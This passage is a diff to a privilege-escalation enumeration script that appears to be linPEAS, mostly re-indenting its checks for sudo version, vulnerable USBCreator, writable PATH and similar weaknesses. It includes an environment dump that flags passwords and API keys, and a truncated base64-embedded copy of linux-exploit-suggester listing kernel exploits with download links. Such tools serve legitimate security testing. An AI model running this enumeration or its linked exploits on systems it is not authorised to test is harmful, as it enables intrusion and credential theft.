"s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then +warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +print_2title "USBCreator" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" +if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then +pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") +if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) +fi +if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" +fi +fi +echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" +#-- SY) System stats +print_2title "System stats" +(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" +warn_exec free 2>/dev/null +echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" +#-- SY) CPU info +print_2title "CPU info" +warn_exec lscpu 2>/dev/null +echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" +#-- SY) Dmesg +print_2title "Searching Signature verification failed in dmseg" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" +(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" +echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then print_2title "Kernel Extensions not belonging to apple" kextstat 2>/dev/null | grep -Ev " com.apple." print_2title "Unsigned Kernel Extensions" macosNotSigned /Library/Extensions macosNotSigned /System/Library/Extensions - fi +fi - if [ "$(command -v bash 2>/dev/null)" ]; then +if [ "$(command -v bash 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester" print_info "https://github.com/mzet-/linux-exploit-suggester" les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMCwgQF9temV0XwojCiMgbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggY29tZXMgd2l0aCBBQlNPTFVURUxZIE5PIFdBUlJBTlRZLgojIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSwgYW5kIHlvdSBhcmUgd2VsY29tZSB0byByZWRpc3RyaWJ1dGUgaXQKIyB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLiBTZWUgTElDRU5TRQojIGZpbGUgZm9yIHVzYWdlIG9mIHRoaXMgc29mdHdhcmUuCiMKClZFUlNJT049djEuMQoKIyBiYXNoIGNvbG9ycwojdHh0cmVkPSJcZVswOzMxbSIKdHh0cmVkPSJcZVs5MTsxbSIKdHh0Z3JuPSJcZVsxOzMybSIKdHh0Z3JheT0iXGVbMDszN20iCnR4dGJsdT0iXGVbMDszNm0iCnR4dHJzdD0iXGVbMG0iCmJsZHdodD0nXGVbMTszN20nCndodD0nXGVbMDszNm0nCmJsZGJsdT0nXGVbMTszNG0nCnllbGxvdz0nXGVbMTs5M20nCmxpZ2h0eWVsbG93PSdcZVswOzkzbScKCiMgaW5wdXQgZGF0YQpVTkFNRV9BPSIiCgojIHBhcnNlZCBkYXRhIGZvciBjdXJyZW50IE9TCktFUk5FTD0iIgpPUz0iIgpESVNUUk89IiIKQVJDSD0iIgpQS0dfTElTVD0iIgoKIyBrZXJuZWwgY29uZmlnCktDT05GSUc9IiIKCkNWRUxJU1RfRklMRT0iIgoKb3B0X2ZldGNoX2JpbnM9ZmFsc2UKb3B0X2ZldGNoX3NyY3M9ZmFsc2UKb3B0X2tlcm5lbF92ZXJzaW9uPWZhbHNlCm9wdF91bmFtZV9zdHJpbmc9ZmFsc2UKb3B0X3BrZ2xpc3RfZmlsZT1mYWxzZQpvcHRfY3ZlbGlzdF9maWxlPWZhbHNlCm9wdF9jaGVja3NlY19tb2RlPWZhbHNlCm9wdF9mdWxsPWZhbHNlCm9wdF9zdW1tYXJ5PWZhbHNlCm9wdF9rZXJuZWxfb25seT1mYWxzZQpvcHRfdXNlcnNwYWNlX29ubHk9ZmFsc2UKb3B0X3Nob3dfZG9zPWZhbHNlCm9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCm9wdF9za2lwX3BrZ192ZXJzaW9ucz1mYWxzZQoKQVJHUz0KU0hPUlRPUFRTPSJoVmZic3U6azpkcDpnIgpMT05HT1BUUz0iaGVscCx2ZXJzaW9uLGZ1bGwsZmV0Y2gtYmluYXJpZXMsZmV0Y2gtc291cmNlcyx1bmFtZTosa2VybmVsOixzaG93LWRvcyxwa2dsaXN0LWZpbGU6LHNob3J0LGtlcm5lbHNwYWNlLW9ubHksdXNlcnNwYWNlLW9ubHksc2tpcC1tb3JlLWNoZWNrcyxza2lwLXBrZy12ZXJzaW9ucyxjdmVsaXN0LWZpbGU6LGNoZWNrc2VjIgoKIyMgZXhwbG9pdHMgZGF0YWJhc2UKZGVjbGFyZSAtYSBFWFBMT0lUUwpkZWNsYXJlIC1hIEVYUExPSVRTX1VTRVJTUEFDRQoKIyMgdGVtcG9yYXJ5IGFycmF5IGZvciBwdXJwb3NlIG9mIHNvcnRpbmcgZXhwbG9pdHMgKGJhc2VkIG9uIGV4cGxvaXRzJyByYW5rKQpkZWNsYXJlIC1hIGV4cGxvaXRzX3RvX3NvcnQKZGVjbGFyZSAtYSBTT1JURURfRVhQTE9JVFMKCiMjIyMjIyMjIyMjIyBMSU5VWCBLRVJORUxTUEFDRSBFWFBMT0lUUyAjIyMjIyMjIyMjIyMjIyMjIyMjIwpuPTAKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBlbGZsYmwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9Mi40LjI5ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vaXNlYy5wbC92dWxuZXJhYmlsaXRpZXMvaXNlYy0wMDIxLXVzZWxpYi50eHQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2VsZmxibApleHBsb2l0LWRiOiA3NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSB1c2VsaWIoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApleHBsb2l0LWRiOiA3NzgKQ29tbWVudHM6IEtub3duIHRvIHdvcmsgb25seSBmb3IgMi40IHNlcmllcyAoZXZlbiB0aG91Z2ggMi42IGlzIGFsc28gdnVsbmVyYWJsZSkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBrcmFkMwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjUsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAxMzk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDQtMDA3N10ke3R4dHJzdH0gbXJlbWFwX3B0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE2MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHJhcHRvcl9wcmN0bApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEzLHZlcjw9Mi42LjE3ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMjAzMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA1CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGw0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDExCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMzYyNl0ke3R4dHJzdH0gaDAwbHlzaGl0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuOCx2ZXI8PTIuNi4xNgpUYWdzOgpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9oMDBseXNoaXQKZXhwbG9pdC1kYjogMjAxMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE3LHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIzLHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTQyMTBdJHt0eHRyc3R9IGZ0cmV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTEsdmVyPD0yLjYuMjIKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA2ODUxCkNvbW1lbnRzOiB3b3JsZC13cml0YWJsZSBzZ2lkIGRpcmVjdG9yeSBhbmQgc2hlbGwgdGhhdCBkb2VzIG5vdCBkcm9wIHNnaWQgcHJpdnMgdXBvbiBleGVjIChhc2gvc2FzaCkgYXJlIHJlcXVpcmVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtNDIxMF0ke3R4dHJzdH0gZXhpdF9ub3RpZnkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yNSx2ZXI8PTIuNi4yOQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDgzNjkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyXSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChzaW1wbGUgdmVyc2lvbikKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT03LjEwLFJIRUw9NCxmZWRvcmE9NHw1fDZ8N3w4fDl8MTB8MTEKUmFuazogMQpleHBsb2l0LWRiOiA5NDc5CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT05LjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hvcmwud29yZHByZXNzLmNvbS8yMDA5LzA3LzE2L2N2ZS0yMDA5LTE4OTUtbGludXgta2VybmVsLXBlcl9jbGVhcl9vbl9zZXRpZC1wZXJzb25hbGl0eS1ieXBhc3MvCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzk0MzUudGd6CmV4cGxvaXQtZGI6IDk0MzUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAgT1IgcHVsc2VhdWRpbyBuZWVkcyB0byBiZSBpbnN0YWxsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NDM2LnRnegpleHBsb2l0LWRiOiA5NDM2CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NjQxLnRhci5negpleHBsb2l0LWRiOiA5NjQxCkNvbW1lbnRzOiAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBuZWVkcyB0byBlcXVhbCAwIE9SIHB1bHNlYXVkaW8gbmVlZHMgdG8gYmUgaW5zdGFsbGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5MixDVkUtMjAwOS0xODk1XSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChwcGMpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiB1YnVudHU9OC4xMCxSSEVMPTR8NQpSYW5rOiAxCmV4cGxvaXQtZGI6IDk1NDUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSB0aGUgcmViZWwgKHVkcF9zZW5kbXNnKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkKVGFnczogZGViaWFuPTQKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NTc0LnRnegpleHBsb2l0LWRiOiA5NTc0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogc3BlbmRlcgpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMCBPUiBwdWxzZWF1ZGlvIG5lZWRzIHRvIGJlIGluc3RhbGxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGhvYWdpZV91ZHBfc2VuZG1zZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGRlYmlhbj00ClJhbms6IDEKZXhwbG9pdC1kYjogOTU3NQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IGFuZGkKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGthdG9uICh1ZHBfc2VuZG1zZykKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xLHZlcjw9Mi42LjE5LHg4NgpUYWdzOiBkZWJpYW49NApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9LYWJvdC9Vbml4LVByaXZpbGVnZS1Fc2NhbGF0aW9uLUV4cGxvaXRzLVBhY2svcmF3L21hc3Rlci8yMDA5L0NWRS0yMDA5LTI2OTgva2F0b24uYwphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IFZ4SGVsbCBMYWJzCkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSBpcF9hcHBlbmRfZGF0YQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGZlZG9yYT00fDV8NixSSEVMPTQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbApleHBsb2l0LWRiOiA5NTQyCmF1dGhvcjogcDBjNzNuMQpDb21tZW50czogV29ya3MgZm9yIHN5c3RlbXMgd2l0aCAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBlcXVhbCB0byAwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMzU0N10ke3R4dHJzdH0gcGlwZS5jIDEKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMxClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMzMzMjEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0zNTQ3XSR7dHh0cnN0fSBwaXBlLmMgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAzMzMyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTM1NDddJHt0eHRyc3R9IHBpcGUuYyAzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDEwMDE4CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzMwMV0ke3R4dHJzdH0gcHRyYWNlX2ttb2QyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjYsdmVyPD0yLjYuMzQKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMnwzM3wzNHwzNSktKDF8Mnx0cnVuayktYW1kNjR9LHVidW50dT0oMTAuMDR8MTAuMTApe2tlcm5lbDoyLjYuKDMyfDM1KS0oMTl8MjF8MjQpLXNlcnZlcn0KUmFuazogMQpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42Lngva21vZDIKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2V